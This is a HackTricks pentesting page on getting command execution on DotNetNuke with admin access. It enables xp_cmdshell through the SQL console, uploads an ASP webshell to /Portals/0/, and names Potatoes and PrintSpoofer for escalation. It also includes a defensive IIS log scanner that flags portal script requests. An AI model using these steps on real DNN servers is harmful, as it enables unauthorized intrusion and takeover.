# DotNetNuke (DNN)
{% hint style="success" %}
Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## DotNetNuke (DNN)
If you log in to DNN as **administrator**, it is easy to obtain RCE.
## RCE
### Via SQL
The **`Settings`** page gives access to a SQL console, where you can enable **`xp_cmdshell`** and **run operating system commands**.
Use the following lines to enable **`xp_cmdshell`**:
```sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
Then press **"Run Script"** to execute those SQL statements.
Then run OS commands with something like the following:
```sql
xp_cmdshell 'whoami'
```
### Via ASP webshell
In `Settings -> Security -> More -> More Security Settings` you can **add new allowed extensions** under `Allowable File Extensions`, then click the `Save` button.
Add **`asp`** or **`aspx`**, then in **`/admin/file-management`** upload an **asp webshell** called, for example, **`shell.asp`**.
Then browse to **`/Portals/0/shell.asp`** to reach the webshell.
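A detection-side view of the upload path above, as an added example that is not part of the original page: it scans IIS W3C logs for requests to server-side scripts under `/Portals/<id>/`, the folder the uploaded file is served from. The function name, the extra `ashx`/`asmx` extensions and the sample log lines are assumptions constructed for this example.

```python
import re

# Script extensions IIS executes. asp/aspx come from the page; ashx/asmx are
# added here as other ASP.NET handler extensions (assumption of this example).
SCRIPT_EXTS = ("asp", "aspx", "ashx", "asmx")
# Uploaded portal files are served from /Portals/<portal id>/.
PORTAL_SCRIPT = re.compile(
    r"^/portals/[^/]+/(?:.*/)?[^/]+\.(?:%s)$" % "|".join(SCRIPT_EXTS), re.I)

def find_portal_script_hits(log_lines):
    """Return (date, time, client_ip, method, uri, status) for each request
    whose path is a server-side script inside a DNN portal upload folder."""
    fields, hits = [], []
    for line in log_lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column layout for the rows below
            continue
        if not line or line.startswith("#") or not fields:
            continue                       # directives, blanks, headerless rows
        row = dict(zip(fields, line.split()))
        uri = row.get("cs-uri-stem", "")
        if PORTAL_SCRIPT.match(uri):
            hits.append((row.get("date"), row.get("time"), row.get("c-ip"),
                         row.get("cs-method"), uri, row.get("sc-status")))
    return hits

# Constructed IIS W3C log sample (not from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-10 09:14:02 GET /Portals/0/Images/logo.png - 198.51.100.7 200
2024-01-10 09:15:40 POST /Portals/0/shell.asp - 203.0.113.25 200
2024-01-10 09:16:05 GET /Default.aspx tabid=41 198.51.100.7 200
2024-01-10 09:17:11 GET /portals/1/docs/Report.ASPX - 203.0.113.25 200
2024-01-10 09:18:30 GET /Portals/0/notes.aspx.txt - 198.51.100.7 404
""".splitlines()

if __name__ == "__main__":
    for hit in find_portal_script_hits(SAMPLE_LOG):
        print(*hit)
```

A hit with status 200 means the script extension was both allowed for upload and executed by IIS, so the `Allowable File Extensions` list should be reviewed alongside the log.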
### Privilege Escalation
You can **escalate privileges** using, for example, **Potatoes** or **PrintSpoofer**.